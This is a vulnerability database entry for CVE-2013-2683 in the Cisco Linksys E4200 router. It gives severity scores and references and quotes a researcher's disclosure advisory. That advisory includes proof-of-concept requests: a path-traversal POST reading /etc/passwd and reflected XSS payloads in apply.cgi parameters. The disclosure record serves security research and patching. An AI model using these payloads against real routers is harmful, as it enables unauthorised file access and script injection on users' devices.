Details of VAR-202002-0524

ID

VAR-202002-0524

CVE

CVE-2013-2683

TITLE

Cisco Linksys E4200 Information leakage vulnerabilities in devices

Trust: 0.8

sources: JVNDB: JVNDB-2013-007177

DESCRIPTION

Cisco Linksys E4200 1.0.05 Build 7 devices contain an Information Disclosure Vulnerability which allows remote attackers to obtain private IP addresses and other sensitive information. The Cisco Linksys E4200 is a high-end home/business wireless router developed by Cisco. This may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html ============================================= January 30, 2013 ============================================= Keywords ============================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684 ============================================= Summary Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ============================================= Overview Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products. Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel. ============================================= Vendor Software Fingerprint ============================================= # Copyright (C) 2009, CyberTAN Corporation # All Rights Reserved. # # THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY # KIND, EXPRESS OR IMPLIED, BY STATUTE..... ============================================= The PoC's ============================================= LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd ============================================= XSS PoC ============================================= /apply.cgi [log_type parameter] /apply.cgi [ping_ip parameter] /apply.cgi [ping_size parameter] /apply.cgi [submit_type parameter] /apply.cgi [traceroute_ip parameter] /storage/apply.cgi [new_workgroup parameter] /storage/apply.cgi [submit_button parameter] ============================================= POST /apply.cgi HTTP/1.1 �.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= Other XSS PoC�s ============================================= &ping_ip='><script>alert(1)</script> &ping_size='><script>alert(1)</script> &submit_type=start_traceroute'%3balert(1)// &traceroute_ip=a.b.c.d"><script>alert(1)</script> ============================================= CVE Information ============================================= File path traversal CVE-2013-2678 Cross-site scripting (reflected) CVE-2013-2679 Cleartext submission of password CVE-2013-2680 Password field with autocomplete enabled CVE-2013-2681 Frameable response (Clickjacking) CVE-2013-2682 Private IP addresses disclosed CVE-2013-2683 HTML does not specify charset CVE-2013-2684 CVSS Version 2 Score = 4.5 ============================================= END ============================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----

Trust: 2.61

sources: NVD: CVE-2013-2683 // JVNDB: JVNDB-2013-007177 // CNVD: CNVD-2013-05039 // BID: 59713 // VULMON: CVE-2013-2683 // PACKETSTORM: 121551

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2013-05039

AFFECTED PRODUCTS

vendor:	cisco	model:	linksys e4200	scope:	eq	version:	1.0.05	Trust: 1.0
vendor:	cisco	model:	linksys e4200	scope:	eq	version:	1.0.05 build 7	Trust: 0.8
vendor:	cisco	model:	linksys e4200	scope:	-	version:	-	Trust: 0.6
vendor:	cisco	model:	linksys e4200 build	scope:	eq	version:	1.0.057	Trust: 0.3

sources: CNVD: CNVD-2013-05039 // BID: 59713 // JVNDB: JVNDB-2013-007177 // NVD: CVE-2013-2683

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2013-2683
value:	MEDIUM
Trust: 1.0
NVD:	JVNDB-2013-007177
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2013-05039
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201305-153
value:	MEDIUM
Trust: 0.6
VULMON:	CVE-2013-2683
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2013-2683
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.1
NVD:	JVNDB-2013-007177
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	NONE
impactScore:	NONE
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.8
CNVD:	CNVD-2013-05039
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6

nvd@nist.gov:	CVE-2013-2683
baseSeverity:	MEDIUM
baseScore:	5.3
vectorString:	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	LOW
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	3.9
impactScore:	1.4
version:	3.1
Trust: 1.0
NVD:	JVNDB-2013-007177
baseSeverity:	MEDIUM
baseScore:	5.3
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	LOW
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: CNVD: CNVD-2013-05039 // VULMON: CVE-2013-2683 // JVNDB: JVNDB-2013-007177 // CNNVD: CNNVD-201305-153 // NVD: CVE-2013-2683

PROBLEMTYPE DATA

problemtype:

CWE-200

Trust: 1.8

sources: JVNDB: JVNDB-2013-007177 // NVD: CVE-2013-2683

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201305-153

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201305-153

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-007177

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2013-2683

PATCH

title:

Top Page

url:

https://www.linksys.com/us/

Trust: 0.8

sources: JVNDB: JVNDB-2013-007177

EXTERNAL IDS

db:	NVD	id:	CVE-2013-2683	Trust: 3.5
db:	BID	id:	59713	Trust: 2.6
db:	PACKETSTORM	id:	121551	Trust: 2.6
db:	JVNDB	id:	JVNDB-2013-007177	Trust: 0.8
db:	EXPLOIT-DB	id:	25292	Trust: 0.7
db:	CNVD	id:	CNVD-2013-05039	Trust: 0.6
db:	CNNVD	id:	CNNVD-201305-153	Trust: 0.6
db:	VULMON	id:	CVE-2013-2683	Trust: 0.1

sources: CNVD: CNVD-2013-05039 // VULMON: CVE-2013-2683 // BID: 59713 // JVNDB: JVNDB-2013-007177 // PACKETSTORM: 121551 // CNNVD: CNNVD-201305-153 // NVD: CVE-2013-2683

REFERENCES

url:	http://packetstormsecurity.com/files/121551/cisco-linksys-e4200-cross-site-scripting-local-file-inclusion.html	Trust: 2.5
url:	http://www.securityfocus.com/bid/59713	Trust: 1.8
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/84067	Trust: 1.7
url:	https://nvd.nist.gov/vuln/detail/cve-2013-2683	Trust: 1.5
url:	http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html	Trust: 1.0
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2683	Trust: 0.8
url:	http://www.exploit-db.com/exploits/25292/	Trust: 0.7
url:	http://support.linksys.com/en-us/support/routers/e4200	Trust: 0.3
url:	https://cwe.mitre.org/data/definitions/200.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-2684	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-2681	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-2679	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-2680	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-2682	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-2678	Trust: 0.1

sources: CNVD: CNVD-2013-05039 // VULMON: CVE-2013-2683 // BID: 59713 // JVNDB: JVNDB-2013-007177 // PACKETSTORM: 121551 // CNNVD: CNNVD-201305-153 // NVD: CVE-2013-2683

CREDITS

sqlhacker

Trust: 1.0

sources: BID: 59713 // PACKETSTORM: 121551 // CNNVD: CNNVD-201305-153

SOURCES

db:	CNVD	id:	CNVD-2013-05039
db:	VULMON	id:	CVE-2013-2683
db:	BID	id:	59713
db:	JVNDB	id:	JVNDB-2013-007177
db:	PACKETSTORM	id:	121551
db:	CNNVD	id:	CNNVD-201305-153
db:	NVD	id:	CVE-2013-2683

LAST UPDATE DATE

2024-08-14T13:24:59.093000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2013-05039	date:	2013-05-10T00:00:00
db:	VULMON	id:	CVE-2013-2683	date:	2020-02-07T00:00:00
db:	BID	id:	59713	date:	2013-05-06T00:00:00
db:	JVNDB	id:	JVNDB-2013-007177	date:	2020-02-20T00:00:00
db:	CNNVD	id:	CNNVD-201305-153	date:	2020-05-25T00:00:00
db:	NVD	id:	CVE-2013-2683	date:	2020-02-07T13:58:19.103

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2013-05039	date:	2013-05-10T00:00:00
db:	VULMON	id:	CVE-2013-2683	date:	2020-02-06T00:00:00
db:	BID	id:	59713	date:	2013-05-06T00:00:00
db:	JVNDB	id:	JVNDB-2013-007177	date:	2020-02-20T00:00:00
db:	PACKETSTORM	id:	121551	date:	2013-05-07T20:22:22
db:	CNNVD	id:	CNNVD-201305-153	date:	2013-05-09T00:00:00
db:	NVD	id:	CVE-2013-2683	date:	2020-02-06T21:15:10.597